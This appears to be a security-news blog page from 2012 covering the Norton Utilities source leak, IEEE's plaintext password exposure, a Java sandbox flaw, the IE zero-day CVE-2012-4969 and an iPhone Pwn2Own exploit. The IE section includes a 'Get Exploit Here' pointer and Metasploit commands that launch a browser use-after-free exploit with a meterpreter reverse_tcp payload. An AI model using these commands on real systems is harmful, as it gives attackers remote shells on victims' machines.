Symantec Norton Utilities 2006 source code leaked by Anonymous

Hackers associate with the Anonymous hacktivist collective published the source code files for Symantec’s Norton Utilities 2006 product on the Pirate Bay Bit Torrent website on Monday, but according to the security vendor the same files had been released in january.

The Pirate Bay torrent was accompanied by a message in which the hackers reffered to Symantec as “the worth security vendor on planet earth” and hinted that the release is not the result of a new security breach. “As many of you know this was planned back before Sabu was arrested, ” the hacker said.

Symantec Norton Utilities 2006 source code leaked by Anonymous

Symantec Norton Utilities 2006 source code leaked by Anonymous

Sabu, the founder of Anonymous- affiliated hacker group LulzSec, was arrested in june 2011 and subsequently worked as an informant for the FBI. However, the public didn’t learn about his arrest and FBI involvement until march 2012.

“Symantec is aware of the claims made online that a group has posted the source code for Norton Utilities 2006, “Cris Paden, manager of corporate communications at semantec, said Tuesday via email. “We have analyzed the code that was already posted by another group in january 2012.”

At the begining of January, a group of hackers called Lords of Dharmaraja, also affiliated with Anonymous, claimed to have stolen the source code for multiple Symantec products and tried to extort money from the company.

A few days later, the group released the source code for the 2006 version of Norton Utilities with the intention of helping a Washington state man’s lawsuit against Symantec. The man had filed a complaint claiming that the trial versions of Norton Utiilities and several other Symantec products display misleading information about the “health” of their user’s computers in order to scare them into buying the full version of the products.

Symantec Norton Utilities 2006 source code leaked by Anonymous

Symantec Norton Utilities 2006 source code leaked by Anonymous

Norton Utilities is a product that includes different Windows system optimization and maintainance tools like registry defragmenter, registry cleaner, file recovery, services manager and others.

” As we stated at that time, the 2006 version of Norton Utilities is no longer sold or supported,”Paden said. The current version of Norton Utilities has been completely rebuilt and shares no common code with Norton Utilities 2006.”

Furthermore, the code’s leak poses no security threat to users of the latest version of Norton Utilities or other Symantec products, Paden Said.

About these ads

100k IEEE site Plain-Text Passwords found on Public FTP

Researcher Finds 100k IEEE.org Passwords Stored in Plain-Text on Public FTP Server

The Institute of Electrical and Electronics Engineers (IEEE) stored usernames and passwords for its users in a plain-text file on a publically accessible server, a Romanian computer scientist has claimed.

A plaintext file containing nearly 100,000 credentials were accessible on an IEEE.Org FTP server for at least one month before it was discovered on Sept. 18, Radu Drăgușin, a teaching assistant in the computer science department at the University of Copenhagen, Denmark, wrote on the IEEElog.com site Tuesday. The file contained users who were employees at companies such as Apple, Google, IBM, Oracle, and Samsung, as well as researchers from NASA, Stanford University, and other institutions, Dragusin wrote.

100k IEEE site Plain-Text Passwords found on Public FTP

100k IEEE site Plain-Text Passwords found on Public FTP

In addition to exposing username and passwords for IEEE members, the FTP server contained the ieee.org Website logs and visitor activity log for spectrum.ieee.org, Dragusin said. It appears the IEEE Web administrators “failed to restrict access” to theWeb server logs for both sites, allowing anyone to view the contents. Every Web request to the Web sites, or more than 376 million HTTP requests, were recorded in those files, Dragusin wrote.

Web server logs should never be publicly accessible as the files generally contain information that can be used to identify users and correlate their browsing activity. It appears that IEEE has closed that security hole, as the files are no longer available.

“If leaving an FTP directory containing 100GB of logs publicly open could be a simple mistake in setting access permissions, keeping both usernames and passwords in plaintext is much more troublesome,” Dragusin wrote.

Security experts have stressed time and time again that best practices call for storing salted cryptographic hashes of passwords, using an algorithm that hasn’t already been cracked. For a professional association which includes computer science professionals and publishes security publications, keeping passwords in plaintext, and then storing them in the same location as the server logs is a colossal, and baffling, mistake to make.

It’s not known at this time whether the file was accessed before Dragusin found it. If someone else got to the file first, those users are at risk for spear phishing attacks or other targeted campaigns. If the IEEE has access logs for its FTP server, the organizations would be able to determine the extent of the damage, Dragusin speculated.

According to Dragusin’s Twitter and Google+ posts, IEEE has yet to notify users, but the organization had posted a note to its website Tuesday afternoon, acknowledging a “security incident”.

100k IEEE site Plain-Text Passwords found on Public FTP

100k IEEE site Plain-Text Passwords found on Public FTP

“We have conducted a thorough investigation and the issue has been addressed and resolved. We are in the process of notifying those who may have been affected,” the IEEE wrote in the statement.

“It would be reasonable to assume, that an organization publishing leading security-focused publications, would value the privacy of its members, and be proactive in keeping their data secure,” Dragusin wrote.

Dragusin analyzed the raw data to figure out where the users were based, what email domains they were using, and common passwords. His analysis of common passwords was particularly disappointing. The top five most popular passwords in the IEEE file turned out to be “123456,” “ieee2012,” “12345678,” “123456789,” and “password. Considering many of IEEE members are security professionals and the organization has worked on various encryption and key management standards, the lack of password sophistication is worrisome.

There’s one positive thing to note, however, since it appears that a majority of the users are using unique passwords. It appears that the top five passwords are being used by only one percent of the affected users, and the top 18 passwords were used by less than two percent of users, according to Dragusin’s analysis. IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and passwords.

Billions of Windows Users Affects with Java Vulnerability

A new Java vulnerability has surfaced that apparently affects all Java runtimes and therefore puts close to a billion users at risk:

It’s just a proof of concept for now, but a newly revealed Java vulnerability could have very widespread repercussions.

Billions of Windows Users Affects with Java Vulnerability

Billions of Windows Users Affects with Java Vulnerability

Security research company Security Explorations has issued a description of a new critical security flaw in Java SE 5 build 1.5.0_22-b03, Java SE 6 build 1.6.0_35-b10, and the latest Java SE 7 build 1.7.0_07-b10. This error is caused by a discrepancy with how the Java virtual machine handles defined data types (a type-safety error) and in doing so violates a fundamental security constraint in the Java runtime, allowing a complete bypass of the Java sandbox.

Security Explorations conducted tests on a fully patched Windows 7 machine, and was able to exploit the bug using the Java plugin in the latest versions of most popular browsers (Internet Explorer, Firefox, Chrome, Safari, and Opera). While the error was only tested on Windows 7 32-bit, being in Java means it is not limited to the Windows platform and will affect anyone with Java installed on their systems, be it Windows, Linux, Mac, or Solaris.

Adam Gowdiak, CEO of Security Explorations, said in a blog post that Oracle has been alerted to the matter and that the company needs to pay attention:

” We hope that a news about one billion users of Oracle Java SE software [3] being vulnerable to yet another security flaw is not gonna spoil the taste of Larry Ellison’s [4] morning…Java. “

Billions of Windows Users Affects with Java Vulnerability

Billions of Windows Users Affects with Java Vulnerability

In an interview with ComputerWorld, Gowdiak explained that this is a new flaw in Java that has persisted even after Oracle’s most recent patch, and when exploited would allow an attacker to use a malicious Java applet to install programs, or read and change data on the system with the privileges of the current user.

Gowdiak also stresses that this is a zero-day flaw; however, zero-day means the flaw is used in active exploits on the same day of its findings (giving developers “zero days” to issue a patch), but there is no mention of an active exploit for this bug, and Gowdiak’s descriptions of it both on the Security Explorations’ blog and in ComputerWorld’s interview suggest it is more of a proof-of-concept at its current state.

So far Oracle has been provided with a technical overview of the bug and example code outlining the flaw, but has not yet acted upon it. It unfortunately is not yet known when Oracle might do so. While for the most recent zero-day vulnerability Oracle broke its quarterly update schedule to address the problem, this action was the first such steps taken and it is possible the company may fall back to its quarterly schedule and issue an update in just less than a month on October 16.

While this bug is more widespread than other recently found Java exploits, so far there is no concrete evidence of it being used in any malware exploits; however, it does stress the importance of reducing the number of active runtimes (code execution environments) on your system. If you do not need Java, then you might be best off uninstalling or disabling it. If you are unsure whether or not you need Java, then you might also remove it and then only reinstall it if any of your activities prompt you for a Java runtime requirement.

Exploit Released for Internet Explorer zero-day attacks : CVE-2012-4969

Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer browser is being actively attacked in the wild. Four active exploits of a zero-day vulnerability in the browser exists. Microsoft will push out an out-of-cycle Windows patch to temporarily fix the critical Internet Explorer flaw.

Exploit Released for Internet Explorer zero-day attacks : CVE-2012-4969

Exploit Released for Internet Explorer zero-day attacks : CVE-2012-4969

Security researcher Eric Romang identified the exploit code on a server used by the “Nitro” hacking group, believed to have exploited the Java zero-day vulnerability reported last month.  Security firm Rapid7 advises that Internet users try a different Web browser. The malware may be linked to an ongoing attack on companies that has been dubbed “Nitro”, and was first discovered in October by Symantec.

The zero-day in IE 6-9 is a use-after-free memory corruption vulnerability, similar to a buffer overflow, that would enable an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie.

This type of attack is typically begun with a phishing email, or by tricking users into clicking links in social media. The security advisory notes that mainstream websites that have ads placed on the site via third-party ad servers could also be vulnerable if the ad servers are compromised. In other words, any site could be used to take advantage of the IE flaw.It’s a serious flaw.

Even, The German government has started telling its citizens to switch to other browsers. Microsoft has reported that most users are not affected by the bug, and the number of attacks has been limited. In the company’s update about the bug, they suggest either deactivating ActiveX controls or using their Enhanced Mitigation Experience Toolkit until a patch is released.

Metasploit also Release PoC for this .”This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.” Get Exploit Here,

Usage :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid

Read More

iPhone 5 and 4 Hacked with same Exploit

IPHONE 5 JAILBREAK: IPHONE 5 HACKED WITH OLD EXPLOIT:iPhone 5 is vulnerable to the same attack that successfully breached an iPhone 4S at the mobile Pwn2Own hacker contest held this week at the EUSecWest event in Amsterdam.

iPhone 5 and 4 Hacked with same Exploit

iPhone 5 and 4 Hacked with same Exploit

WHO?Joost Pol and Daan Keuper won the mobile Pwn2Own contest by compromising a fully patched iPhone 4S device and stealing contacts, browsing history, photos and videos from the phone.

COOL: The vaunted security of the iPhone 4S took an epic fail tumble during the event when they was able to build an exploit for a vulnerability in WebKit to beat Apple’s code-signing features and the MobileSafari sandbox.

HMMM: The same bug is present in the iOS6 Golden Master development code base, which means iPhone 5 is  also vulnerable to the same exploit. Apple iPads and iPod Touch devices are also vulnerable.

RESULT: “We specifically chose this one because it was present in iOS 6, which means the new iPhone coming out today will be vulnerable to this attack,” Pol said. The duo won $30,000 for their efforts. Read More